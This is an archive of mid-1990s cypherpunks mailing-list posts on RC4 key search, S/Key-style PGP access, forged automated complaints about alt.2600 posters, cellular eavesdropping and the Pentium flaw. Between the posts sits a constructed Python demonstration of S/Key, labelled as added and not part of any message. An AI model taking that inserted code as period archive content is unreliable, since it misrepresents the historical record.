Maybe someone from Netscape could clear up how this is done.

Hal

From eric at remailer.net Sat Dec 17 14:35:53 1994
From: eric at remailer.net (Eric Hughes)
Date: Sat, 17 Dec 94 14:35:53 PST
Subject: Time to exhaustively break 40-bit RC4?
In-Reply-To: <199412172149.NAA15954@jobe.shell.portal.com>
Message-ID: <199412172333.PAA11128@largo.remailer.net>

   From: Hal

   I notice in the Netscape SSL spec the 40-bit export-approved RC4 key generation is a little more complicated than I would have thought.

[The RC4 key is a hash of the external key. Are 40 or 128 bits of this hash used?]

   If the former, then this extra hash step should really slow down exhaustive search of the key space. If the latter, then it is not clear why the master key is key-size restricted at all since it is not likely to be used in searching the key space.

It doesn't really matter, from a crack designer's point of view. It all depends on what keyspace you're actually searching. You can search either the external key (40 bit) or the internal key (larger).
Clearly you have to search the external keyspace.

In order to search the external keyspace, you have to simulate the whole algorithm, which in this case is not _just_ RC4 but also preliminary key setup phase. It's just another part of the algorithm.

To make the distinction precise, what you're searching is not 40-bit RC4 but rather 40-bit RC4-as-used-in-SSL. The compound algorithm is not identical to the underlying algorithm.

This is one of the design problems in Wiener's DES-cracking machine (designed and unbuilt), that it can only crack DES as such and not minor modifications to it. The machine uses a little polynomial generator (similar to using CRC) to be able to partition the keyspace among processors and to keep the pipelines full. This is a hard-wired generator.

The architectural improvement needed in a practical machine would be an interconnect for key candidate sequencing. This would add to the cost of the machine, but only by, say, 20% at most. It would be expensive as interconnects go because the bandwidth is so high.

Suppose an RC4 cracker existed with the above interconnect. In order to crack RC4-SSL, you'd need a second simulator that did all the hashing and spat keys out its interconnect. Such a front end would have to be designed for every particular configuration used.

Eric

From eric at remailer.net Sat Dec 17 14:42:55 1994
From: eric at remailer.net (Eric Hughes)
Date: Sat, 17 Dec 94 14:42:55 PST
Subject: Thoughts on 15 day CJ crypto
In-Reply-To: <199412172058.MAA13081@jobe.shell.portal.com>
Message-ID: <199412172340.PAA11144@largo.remailer.net>

   From: Hal

   Maybe it would be wise when using limited-length session keys to use larger encryption exponents just to confound an exhaustive search of the session key space.

It would, but remember that you're generally going to be generating those keys with the application that will be using them eventually. One could write a spoofer, perhaps, to generate your own keys, but most people won't be using it.
   I think it is surprising if there is no limitation on encryption exponent size for these exportable key systems, assuming that is the strategy the government is using.

Consider the position from the viewpoint of the NSA. Suppose that the hypothesis is correct, and session keys encrypted with short exponents are used to verify candidates. You haven't told anybody this is the reason for the particulars of the restrictions.

So, do you, the NSA, write the restriction into the regulation? Or do you rely on the fact that the developer will optimize public keys for speed? The first strategy reveals tactics. The second carries some risk.

Eric

From sdw at lig.net Sat Dec 17 15:07:41 1994
From: sdw at lig.net (Stephen D. Williams)
Date: Sat, 17 Dec 94 15:07:41 PST
Subject: "Any of the mailers that you can use on a shell are oxen"
In-Reply-To:
Message-ID:

> > L. Futplex McCarthy wrote:
...
> There can be no other lasting solution but to abandon VTwhatever in favor
> of bitmapped output devices. Since running X over a dial-up connection is

Have you ever done it? It isn't too bad. Especially if you are running well-behaved apps (most are) that aren't too graphical. Really only large images are a problem. Oddly, I've even seen better performance with xterm shells than telnet through a firewall. I haven't even seen the new version of X over slip protocol compression.

> rather inefficient, and considering the significant computing power of the
> PC's that are now being underused as dumb terminals, processing the data
> locally seems to be a sensible solution.
>

I agree.

>
> -- Lucky Green
> PGP encrypted mail preferred.

sdw
--
Stephen D.
Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw
Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94

From cactus at seabsd.hks.net Sat Dec 17 16:33:08 1994
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Sat, 17 Dec 94 16:33:08 PST
Subject: QUERY: S/Keyish PGP?
Message-ID: <199412180038.TAA03190@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

A quick question: Has anybody considered the possibility of hacking something into PGP's password protection to allow an S/Key like access?

IE, I'm sitting here in FL on a 2400 bps modem, telnetted through Netcom's dialup to hks.net, so I'm not bloody likely to be typing my passphrase in and thus am barred from using PGP (without hideous contortions, that is).

My questions:

- Has anybody done any work on making an S/Key-like mechanism with the assumption that the machine running PGP is (somewhat) secure? This I'm certain is technically possible.

More complex:

- Has anybody put any thought into a mechanism based upon one-time passwords for regulating PGP private key use on shared, insecure machines (strength == quality of password, of course)?

If people could have a widget very much like the Macintosh S/Key widget on their Mac from which they could cut-n-paste their one time password, it seems like we'd be one step closer to addressing concerns like Tim's.

Just a thought... A GUCAPI would make such a mechanism easier, of course (I haven't abandoned the GUCAPI thought: I'm just gestating).

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLvOEUSoZzwIn1bdtAQGRSgF8DAt6/1WjmiU3clMy0E+EU4RDmcF0JaGC
Y+pNb8dgOzWXEr9b5EyWM0BS4uqw13mK
=Xsa9
-----END PGP SIGNATURE-----

From adam at bwh.harvard.edu Sat Dec 17 21:16:55 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sat, 17 Dec 94 21:16:55 PST
Subject: QUERY: S/Keyish PGP?
In-Reply-To: <199412180038.TAA03190@bb.hks.net>
Message-ID: <199412180516.AAA21349@bwh.harvard.edu>

| A quick question: Has anybody considered the possibility of hacking
| something into PGP's password protection to allow an S/Key like access?

I thought of this, bounced it off a few people, none of whom caught the flaw. When I got around to implementing it, I realized that for it to work, your key would have to be securely stored on your unix box without encryption.

The way S/key works is it uses your ability to provide the input to a one way function whose expected output S/key knows. There is no secret data stored on the server. In contrast, PGP needs secret data which it uses to encrypt your key while it is stored.

Offhand, I doubt it can be done without storing your key in the clear, or trusting the local CPU. If you can store your key in the clear because you feel the compromise of your key is an acceptable risk, you are all set. Similarly, if you trust the local CPU, you can probably do an encrypted telnet or somesuch.

Don't take that to mean it can't be done; I'm not even an amateur cryptographer, and there may well be some clever way of doing this that I haven't thought of.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From jdwilson at gold.chem.hawaii.edu Sat Dec 17 23:13:18 1994
From: jdwilson at gold.chem.hawaii.edu (NetSurfer)
Date: Sat, 17 Dec 94 23:13:18 PST
Subject: FV & PGP (was Re: First Virtual email security)
Message-ID: <199412180718.CAA07031@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 17 Dec 1994 nsb at nsb.fv.com wrote:

> Once more, with feeling:
>
> It is NOT an either/or. In the First Virtual system, the credit card
> number NEVER GOES OVER THE NET AT ALL, which means that it doesn't go
> over the net in the clear AND it doesn't go over the net encrypted.
>

I got your point from your first response. The remaining 5 were not necessary. I do not continue to question this point.

But I might point out that companies doing business on the net might not like having the details of their day to day transactions sniffable, as you can build quite a good business intelligence profile from that type of info. As can the IRS, FBI, etc. Nor would they appreciate being spoofed...

I strongly suggest you take another serious consideration of implementing encryption *now* rather than later, as your current scheme is not thoroughly protecting the privacy of individuals or organizations until you do.

- -NetSurfer

#include
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
== = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 >
" " o " |P. O. Box 15432 | finger for full PGP key >
" " / \ " |Honolulu, HI 96830 |====================================>
\" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvPiKioZzwIn1bdtAQEBVAGAhjULtzChTtOy5zY0L+kjuzzXXNLfeYAL jJqKiETK5l8GqqGPXr/I+yx3z7PSu3zN =bcUC -----END PGP SIGNATURE----- From rshea at netcom.com Sat Dec 17 23:29:25 1994 From: rshea at netcom.com (rex) Date: Sat, 17 Dec 94 23:29:25 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412150210.SAA05624@netcom7.netcom.com> Message-ID: <8CrykCDmFfp8075yn@netcom.com> In article <199412150210.SAA05624 at netcom7.netcom.com>, you wrote: > > Notice: MPEG-II Video Mail Attached: Quicktime 2.1-compatible. This > messages has been formatted as a HyperMIME document. Do not attempt to > read it on a non-HyperMIME-compliant system. Thanks Tim, I needed that! And thanks also for your insightful, albeit less humorous, posts. -rex PS, just read of your intended departure. Please don't. The list really needs your viewpoint. There are some vocal, abusive, elitists on the list who (IMO) haven't a clue how many people are stuck with less than bleeding edge software, no SLIP access, etc. Without some counterpoint they may totally lose contact with the rest of us. From unicorn at access.digex.net Sun Dec 18 02:01:23 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Sun, 18 Dec 94 02:01:23 PST Subject: Automated Witchhunt: I've been slandered by a script. 
In-Reply-To: <199412180709.XAA04015@netcom17.netcom.com> Message-ID: On checking my mail early this morning I found this: > Received: from access4.digex.net by nfs1.digex.net with SMTP id AA24362 > (5.67b8/IDA-1.5); Sun, 18 Dec 1994 02:10:05 -0500 > Received: from nfs2.digex.net by access4.digex.net with SMTP id AA23077 > (5.67b8/IDA-1.5); Sun, 18 Dec 1994 02:10:03 -0500 > Received: from netcom17.netcom.com by nfs2.digex.net with SMTP id AA06122 > (5.67b8/IDA-1.5); Sun, 18 Dec 1994 02:10:02 -0500 > Received: by netcom17.netcom.com (8.6.9/Netcom) > id XAA04015; Sat, 17 Dec 1994 23:09:54 -0800 > Date: Sat, 17 Dec 1994 23:09:54 -0800 > Message-Id: <199412180709.XAA04015 at netcom17.netcom.com> > To: unicorn at access.digex.net, cert at cert.org, emmanuel at well.sf.ca.us, > postmaster at access.digex.net, postmaster at access.digex.net > Subject: Re: Police & BBS...Sundevil revisited in Florida > From: unicorn (Black Unicorn) > > If you are not aware of the nature of the group alt.2600, I will explain it. > It is a hacker/cracker newsgroup, containing many illegal messages. A great > deal of its posters ask questions about or give advice on compromising > system security, even that of the system they are on. Phone "phreaking" is > freely discussed, and they explain to each other how to cheat the long > distance telephone carriers. Pirate ftp and fsp sites are often traded by > these people, and you should verify that one has not been set up on your > system, and that the user does not have pirated software in his directory. > Such could get your entire site shut down. Other verified topics that people > explain how to do and admit to doing are disrupting irc, spamming, > mailbombing, shoplifting, disrupting public transportation, and similar > dangerous and illegal mischief. 
> > This automated message is sent for two reasons: > > 1) To alert you of a potential threat to your system's security, in the > cases of users asking about or being told how to attempt to exploit security > vulnerabilities. Also, the poster may be using a stolen account. > > 2) To alert you that there are crackers on your machine. The account used to > post from may not be legitimate, or may be stolen (it is _extremely_ common > with alt.2600 posters to use fraudulently obtained accounts). Or, a post of > its nature may likely be a violation of terms of a membership agreement. > And, the user making this post may be preparing to break into yours or > another system, if they have not done so already. It is suggested that you > keep a close eye on users who have posted to alt.2600, and to inspect their > files and email if the posting warrants such and you can legally do so. > > All headers and complete text of original message follow: > *************************************************************************** > Xref: netcom.com comp.org.eff.talk:42937 alt.cyberpunk:43019 alt.cyberspace:8271 alt.wired:15428 alt.2600:40781 can.infohighway:2284 alt.pagan:82507 alt.bbs:37526 > Path: netcom.com!ix.netcom.com!howland.reston.ans.net!news1.digex.net!access4!unicorn > From: unicorn at access4.digex.net (Black Unicorn) > Newsgroups: comp.org.eff.talk,alt.cyberpunk,alt.cyberspace,alt.wired,alt.2600,can.infohighway,alt.pagan,alt.bbs > Subject: Re: Police & BBS...Sundevil revisited in Florida > Followup-To: comp.org.eff.talk,alt.cyberpunk,alt.cyberspace,alt.wired,alt.2600,can.infohighway,alt.pagan,alt.bbs > Date: 12 Dec 1994 20:56:36 GMT > Organization: Express Access Online Communications, Greenbelt, MD USA > Lines: 42 > Distribution: inet > Message-ID: <3cide4$e5n at news1.digex.net> > References: <3c94ll$p9t at potogold.rmii.com> > NNTP-Posting-Host: access4.digex.net > X-Newsreader: TIN [version 1.2 PL2] > > Tommy Watt - G.W. 
Technologies (gwtek at rmii.com) wrote:
> : Damn.. . all this reminds me of the bust the local police department did
> : on my BBS system..
>
> : Under allegations of hacking, they took ALL my computer equipment,
> : anything that looked like a computer, anything that couldda been turned
> : into a computer, and misc. stuff..
>
> : The warrant is pretty much invalid, on the blank where it says "things
> : that if found may be seized" is "-- SEE ATTACHMENT 'B'" . . I didn't even
> : SEE attachment B, and when I asked for it, they said they don't even have
> : to show me this.
>
>
> It's typical to seal this document.
>
> Unfortunately it's also a tool used for harassment, as you have to go to
> a hearing to get the document opened, or looked at by a judge who will
> make a determination as to the legitimacy of the sealed materials and
> their seizure.
>
> Guess what the result in your case will be.
> (Left as an exercise to the reader.)
>
>
> : This bullshit pisses me off. . . And now they are saying that if
> : anything is damaged I can't do shit because my computer equipment was
> : "laying out unprotected"..
>
> Also typical of the type of computer seizures I have seen in past.
>
> The common practice is to keep the equipment long enough that it's
> obsolete when you get it back. Easy to do now-a-days.
>
>
> : Andy Goodwin
>
> -uni- (Dark)
>
> --
> 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
> 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!
> ** end quotation. **

Obviously, I did not post the portion claiming to be an "automated message" and a warning to whomever will listen. Yet, the post claims to be from me.

It seems then that someone is running a process which looks for posts to alt.2600, and then automates the above response, original post attached, to warn off system admins, fight crime, save the day, etc. etc. Either that or Lance is bored again.

Does this disturb anyone besides me?
Most obviously, the misattribution is concerning. Clearly the threat of misattributed automated posting is merely one more argument for digitally signing each and every message and post.

Less obvious, but perhaps more ominous is the concept itself of automated postings that amount to censorship chain letters.

"System Administrator A didn't pay attention to this message and refused to snoop into his users' directories and three weeks later his system was shut down. System Administrator B heeded this letter's warning, and saved his access provider from certain doom!"

Look carefully at what this letter says, what it urges system operators to do.

1> Because alt.2600 is occasionally used to trade pirate ftp sites, those who post to alt.2600 are probably pirates. ergo, System Admins. should check the directory of any users who post to alt.2600. If you don't snoop, your system will be shut down.

2> alt.2600 is used to promote shoplifting, and irc disruption. (No relevance is even attempted by the message on this point.)

And the purpose of the letter?

1> To alert you that this user is probably posting from a stolen account. That the named user is probably a security risk, a troublemaker, a political dissident, or whatever else comes to mind.

2> "To alert you that there are crackers on your machine." Not that there MAY BE crackers, not that crackers are known to be on alt.2600, and therefore may be on your system, but that crackers ARE ON YOUR MACHINE. If the bald misrepresentation of this statement evades anyone who reads this, I simply give up all hope.

3> That the post may be a violation of the access provider's membership agreement. (As if the automated or manual sender of the message has any idea what the membership agreement of my particular provider might be)

4> The user making this post may be preparing to break into [your machine] or another system, if they have not done so already.

5> To suggest that system admins. "...keep a close eye on users who have posted to alt.2600, and to inspect their files and email [if it's legal]."

For those recipients of this message that do not know me, I am an attorney, a member of the D.C. bar, and a law abiding person. The allegation that I, by replying to a message crossposted to alt.2600, am a hacker, a cracker, a shoplifter, a vandal, or whatever other villain of the week you might choose to insert is absurd. The above message constitutes slander, defamation of character, and is entirely untrue in any regard to me other than in so far as it indicates my words might have reached alt.2600 at some time or another.

The content of my original quoted message alone should indicate to any reader how absurd the "automated posting"'s allegations are, and demonstrate the pure uselessness of such an approach as a means of accomplishing anything more than to annoy, accuse, threaten, and waste bandwidth. The fact that the automated posting purports to be sent from me almost makes whatever hacking I am supposed to have done seem tame.

From a legal standpoint, the automated posting is entirely lacking in any basis whatsoever for increased scrutiny of my, or any other account address which it slanders. Directing scrutiny to accounts posting at one time or another to "questionable" newsgroups should prompt one to ask one's self about the state of free speech in cyberspace, and increasingly, in this country. What has become of our system that discussion forums, be they on "questionable" topics or not, become probable cause for investigating system users, or rummaging through accounts?

I hereby inform the system administrators on my provider, as well as others, that I would consider increased attention to my account, or any other based on this sham of an "automated posting," harassment, invasion without cause, a violation of several electronic privacy acts, and simple witch hunting.
Should I come by any indication that such attention is directed to my account, I shall immediately terminate my account with Express Access, and pursue what legal action is available to me to the full extent possible.

System administrators would do well to inform themselves of the requirements for intrusion into users' accounts, the protections provided those accounts both by statute, and constitution.

While anonymous writings, political speech and literary products have a long and sacred history in the United States, baseless accusations leveled by anonymous finger pointers do not. I find the tactic and tone of this automated posting distasteful and offensive in the extreme. I urge system admins at my, and other providers, to discourage the use of such automated witchhunts, and expose the party/parties responsible for the distribution. I, for one, would be very interested in talking to the individual/s responsible.

-uni- (Dark) [unicorn at access.digex.net]

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From dfloyd at io.com Sun Dec 18 02:50:21 1994
From: dfloyd at io.com (dfloyd at io.com)
Date: Sun, 18 Dec 94 02:50:21 PST
Subject: alt.2600 spam
Message-ID: <199412181050.EAA23590@pentagon.io.com>

-----BEGIN PGP SIGNED MESSAGE-----

[Post deleted about auto-reply to one's system administrator if (s)he posts on alt.2600 by Black Unicorn]

FWIW, the person doing that crud on Netcom has had his/her account yanked permanently.

(note new PGP key...)
From lmccarth at ducie.cs.umass.edu Sun Dec 18 03:13:51 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 18 Dec 94 03:13:51 PST Subject: Kibo recommends PGP to Bob Rae (fwd) Message-ID: <199412181118.GAA08711@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- For those who don't know, Kibo is a fairly famous Usenet personality. I've no idea whether he uses PGP, but it's encouraging to see him recommending it to Bob Rae.... - - -L. Futplex McCarthy Forwarded article: > Newsgroups: ont.general,alt.religion.kibology > From: kibo at world.std.com (James "Kibo" Parry) > Subject: Re: Thanks > Message-ID: > References: <1994Dec9.222452.21478 at govonca.gov.on.ca> > Date: Wed, 14 Dec 1994 15:28:02 GMT > > [ont.general] > In <1994Dec9.222452.21478 at govonca.gov.on.ca> premier at govonca.gov.on.ca (Premier of Ontario) writes: > > Many thanks to those of you who flamed the PC pranksters. I knew > > when I went online that I would have to deal with fake posts and related > > chaff. > > Might I suggest looking into using a PGP signature to prevent this from > happening again? [...] - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvQZVGf7YYibNzjpAQEsUgQA1Nm6MZtxFub2lvx3QE70sht2dQyvR9iC 1PXdNhImVm5/Wlu6+xJbEQBIBB229+F4NOrs8E4T9f5/ZjEyZQnW9AsRQ4KQwThz ShUAf//6RIOcOWj9qc5YZWjAXxFaaq9nud7bAbZ+sTwiw+2/5y1lZSWhcF8nfeXw UesP86rCjKw= =oNiJ - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLvQahyoZzwIn1bdtAQGuugGAmrWYvSpkE9IGBm9+DrxU4Mn0XKPT5ovm
D+3A6cSINGhiEY2EAg/YV0RUxXYMz2yY
=30UW
-----END PGP SIGNATURE-----

From bryce at cybernet.co.nz Sun Dec 18 04:07:02 1994
From: bryce at cybernet.co.nz (Bryce Boland)
Date: Sun, 18 Dec 94 04:07:02 PST
Subject: No Subject
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>Well that's 2 replies, Man it's going to be packed! :)
>
>When a meeting happens what do we discuss?/do?
> - an obvious one would be NZ crypto!
> - New crypto ideas?
> - NZ Anon remailers & Repositories
> - Patents??? (maybe not)
> - Cryptanalysis (Hopefully, oh please-oh please)

We haven't heard from Peter Gutmann yet (probably because he is so busy), but if he turns up it would be interesting to hear about any future plans for SFS. I don't mind explaining a little bit about some areas of cryptanalysis, maybe the various sieves. Chris might want to talk about some hardware ideas.

>PS: Why do we need a workstation? (probably a dumb question)

To try stuff out, play with programs, broadcast the nonsense worldwide over the net ... We don't need one, we just need people who have a common interest and something to say about it.
-----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: Please note my current address is bryce at cybernet.co.nz iQCVAwUBLvJtYtXxuu4HpwwBAQF9PgP/ZLORHZjtNqchFHZSuhHfqQIFqrfdJIyI C7J7jCSnpt8cEqdZKJf2xSU6oeITg8oL388KwqY+O0em2O0QyiWqNZZcv4oJItFs 4R/lECvtrO9a5YbNyT4tgzFXWM2muULoYbSog2FhUlFOkNAfwRaJCqIghQceOrzF apRh15/AH1I= =3/2q -----END PGP SIGNATURE----- ------------------------------------------------------------------------------- Bryce Boland Finger for PGP Public Key From entropy at IntNet.net Sun Dec 18 07:08:10 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 18 Dec 94 07:08:10 PST Subject: Cellular Privacy [Digital vs. Analog] In-Reply-To: <9412161623.AA23186@chaos.intercon.com> Message-ID: > Well, it is true, from a pragmatic point of view. A neighborhood kid with a > Radio Shack scanner can't listen in on digital cellular calls. You have to > actually hack a phone, which is a much less prevalent skill. True. And the fact is, monitoring any _one specific call_ is rather difficult to do without specialized equipment - in my experience with modified analog phones, one has to hop between 50 cells at the minimum before they can hope to monitor a specific call. I've yet to obtain a digital cellphone to modify, but with the recent legislation about cellular phone monitoring, I wouldn't be surprised if it were more difficult to hack them. (and just from the size of them alone, I would guess that they're mostly surface-mount, which is a pain in the arse for most people without elaborate facilities) > I still think that CDMA+DES is the way to go for secure cellular, but from a > purely pragmatic point of view simply going digital does increase privacy. > Using analog cellular is like using a walkie-talkie. Good analogy. -jon ( --------[ Jonathan D. 
Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )

From entropy at IntNet.net Sun Dec 18 07:21:07 1994
From: entropy at IntNet.net (Jonathan Cooper)
Date: Sun, 18 Dec 94 07:21:07 PST
Subject: Automated Witchhunt: I've been slandered by a script.
In-Reply-To:
Message-ID:

> Obviously, I did not post the portion claiming to be an "automated
> message" and a warning to whomever will listen. Yet, the post claims to
> be from me.

I have received a pair of similar messages; I found it quite irritating. The message is apparently from rcalasso at netcom.com, with pointers to ghoast at gnu.ai.mit.edu.

> Does this disturb anyone besides me?

Yes. It irritates the shit out of me, to put it bluntly. I didn't post anything remotely insecure, but how am I to know that my admins will even read the text of my message? I don't want my account-space searched, even though I'm not worried about anything being found - it's a matter of principle.

> very interested in talking to the individual/s responsible.

Addresses are above.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )

From jya at pipeline.com Sun Dec 18 08:04:40 1994
From: jya at pipeline.com (John Young)
Date: Sun, 18 Dec 94 08:04:40 PST
Subject: NYT on Pentium
Message-ID: <199412181603.LAA25292@pipe1.pipeline.com>

John Markoff writes today on Intel's mishandling of the Pentium flaw. Mr. T May quoted.

For email copy send blank message with subject: 585_999

Here are a few excerpts:

In recent weeks, evoking memories of Richard Nixon at the height of the Watergate crisis, Mr. Grove has retreated to his "war room" inside the company's corporate headquarters in Santa Clara.
*** 'Righteousness' How did a sporadic arithmetic error that was not detected for months, in the chip that Intel insists is its most heavily tested microprocessor in history, become the heart of such a debacle? The answer is rooted in Intel's distinctive corporate culture, and suggests that Intel went wrong in much the same way as other big and unresponsive companies before it. Intel has traditionally valued engineering over product marketing. Inward-looking and wary of competitors (from experience with the Japanese), it developed a bunker mentality, a go-for-the-jugular attitude and a reputation for arrogance. "There are certain elements in Intel's culture, and one is righteousness," said Federico Faggin, a former Intel engineer and co-inventor of its first microprocessor. "The attitude at Intel is, 'We're better than everyone else and what we do is right and we never make mistakes.' " *** But the technologist's mind-set did little to prepare Intel for the consumer marketplace. Although it spent hundreds of millions of dollars on its "Intel Inside" and Pentium ad campaigns, the consumer-oriented strategy unraveled last month when Mr. Grove dismissed customers' requests for chips to replace the Pentium. *** "What Intel clearly should have done is issued a bug report as soon as they found out it was a reproducible problem," said Timothy May, a former Intel semiconductor engineer. "Instead, by keeping it mum, they backed themselves into a corner." But although he has issued a public apology for the flaw, Mr. Grove has been unwilling to personally come forward in an effort to restore customer confidence. "The test of a great company is in how they handle disasters," said James F. Moore, head of Geopartners, a high-tech consulting firm. "This is one where you can't behave like a paranoid. This is one where only the compassionate survive." 
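Added example, not part of any message in this archive: Adam Shostack's reply in the "QUERY: S/Keyish PGP?" thread above contrasts S/Key, where the server stores only the expected output of a one-way function, with PGP, which needs a secret to decrypt the stored key. The Python below shows both sides; SHA-256, the toy key wrap, and every name and sample value are assumptions made for the illustration, not S/Key's or PGP's actual formats.

```python
import hashlib
import hmac

# Constructed sample values (assumptions for this illustration only).
SEED = b"hk12345"
PASSPHRASE = b"correct horse battery staple"
PRIVATE_KEY = b"-- constructed stand-in for a PGP secret key --"


def H(data: bytes) -> bytes:
    """One-way function; SHA-256 stands in for the hash real S/Key uses."""
    return hashlib.sha256(data).digest()


def otp(seed: bytes, passphrase: bytes, n: int) -> bytes:
    """H applied n times to H(seed || passphrase); computed on the user's own machine."""
    value = H(seed + passphrase)
    for _ in range(n):
        value = H(value)
    return value


class SKeyServer:
    """Holds no secret: only the seed, a counter, and the last accepted response."""

    def __init__(self, seed: bytes, verifier: bytes, count: int):
        self.seed, self.verifier, self.count = seed, verifier, count

    def challenge(self):
        """Tell the user which chain position to send next."""
        return self.seed, self.count - 1

    def login(self, response: bytes) -> bool:
        # Accept only a preimage of the stored value, then store it for next time.
        if self.count <= 0 or not hmac.compare_digest(H(response), self.verifier):
            return False
        self.verifier, self.count = response, self.count - 1
        return True


def _keystream(key: bytes, length: int) -> bytes:
    out, counter = b"", 0
    while len(out) < length:
        out += H(key + counter.to_bytes(4, "big"))
        counter += 1
    return out[:length]


def wrap(secret: bytes, kek: bytes) -> bytes:
    """Toy authenticated wrap (hash keystream plus HMAC tag); not PGP's format."""
    enc_key, mac_key = H(b"enc" + kek), H(b"mac" + kek)
    body = bytes(a ^ b for a, b in zip(secret, _keystream(enc_key, len(secret))))
    return hmac.new(mac_key, body, hashlib.sha256).digest() + body


def unwrap(blob: bytes, kek: bytes):
    """Return the secret, or None when kek is not the key the blob was wrapped under."""
    enc_key, mac_key = H(b"enc" + kek), H(b"mac" + kek)
    tag, body = blob[:32], blob[32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()):
        return None
    return bytes(a ^ b for a, b in zip(body, _keystream(enc_key, len(body))))


def demo() -> dict:
    n = 5
    server = SKeyServer(SEED, otp(SEED, PASSPHRASE, n), n)
    # What sits on the shared machine's disk: the key wrapped under the passphrase.
    blob = wrap(PRIVATE_KEY, H(PASSPHRASE))

    seed, index = server.challenge()
    first = otp(seed, PASSPHRASE, index)
    return {
        "login": server.login(first),
        "replay": server.login(first),  # a sniffed response is useless afterwards
        "next": server.login(otp(SEED, PASSPHRASE, server.challenge()[1])),
        # Everything the server stores or has seen, tried as an unlock key:
        "unlock_with_server_state": [
            unwrap(blob, k) for k in (server.seed, server.verifier, first)
        ],
        # Only the long-term secret itself opens the stored key.
        "unlock_with_passphrase": unwrap(blob, H(PASSPHRASE)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The server can check a login with public state alone, but nothing it holds can decrypt the key file, which is the gap the reply describes.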

From eggo at student.umass.edu Sun Dec 18 09:02:41 1994
From: eggo at student.umass.edu (Round Waffle)
Date: Sun, 18 Dec 94 09:02:41 PST
Subject: alt.2600 spam
In-Reply-To: <199412181050.EAA23590@pentagon.io.com>
Message-ID: <199412181702.MAA01421@twain.ucs.umass.edu>

> [Post deleted about auto-reply to one's system administrator if (s)he
> posts on alt.2600 by Black Unicorn]
>
> FWIW, the person doing that crud on Netcom has had his/her account
> yanked permanently.
>

Well, actually, it has begun again. Apparently either it is being done with cracked accounts, or someone is distributing the script around, since the original messages came from pbergman at netcom.com, while the latest batch (I got 3 this morning), came from a different netcom user. (Apologies for not having a name, I misplaced the posts.)

It's safe to say that this second wave is just an "annoyance" one, as one of the people listed in the headers of the mail is emmanuel at well.sf.ca.us, the editor of 2600. Thus, I think this is more for harassment of him than for any kind of serious attempt to have people's accounts rifled.

ObCrypto: How long until someone decides that anyone who posts to alt.security.pgp is obviously a spy/kiddie porn collector/secretive serial killer/UNABOMer/etc., and takes it upon themselves to notify half a dozen people of such?

> (note new PGP key...)
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> -----END PGP SIGNATURE-----
>

+- eggo at student.umass.edu --><-- Eat Some Paste -+
+- Yorn desh born, der ritt de gitt der gue, -+
+- Orn desh, dee born desh, de umn bork! bork!
bork! -+
+----------------- The Durex Blender Corporation ----------------+

From warrior at infinet.com Sun Dec 18 10:05:07 1994
From: warrior at infinet.com (warrior)
Date: Sun, 18 Dec 94 10:05:07 PST
Subject: Automated Witchhunt: I've been slandered by a script.
In-Reply-To:
Message-ID:

Perhaps this is a prime time to sign all messages, and use hpack to protect those unix files and directories from prying eyes. I am still trying to figure out how to set up PGPsendmail or AutoPGP or connect PGP to some mail program so this can be done automatically. I would appreciate any help offered. Meanwhile, what can you do other than swamp their sysadmin with complaints, forward their antics to CERT, as they have done?

Regards,
Dave

On Sun, 18 Dec 1994, Jonathan Cooper wrote:

> Yes. It irritates the shit out of me, to put it bluntly. I didn't
> post anything remotely insecure, but how am I to know that my admins will
> even read the text of my message? I don't want my account-space
> searched, even though I'm not worried about anything being found - it's a
> matter of principle.
> -jon
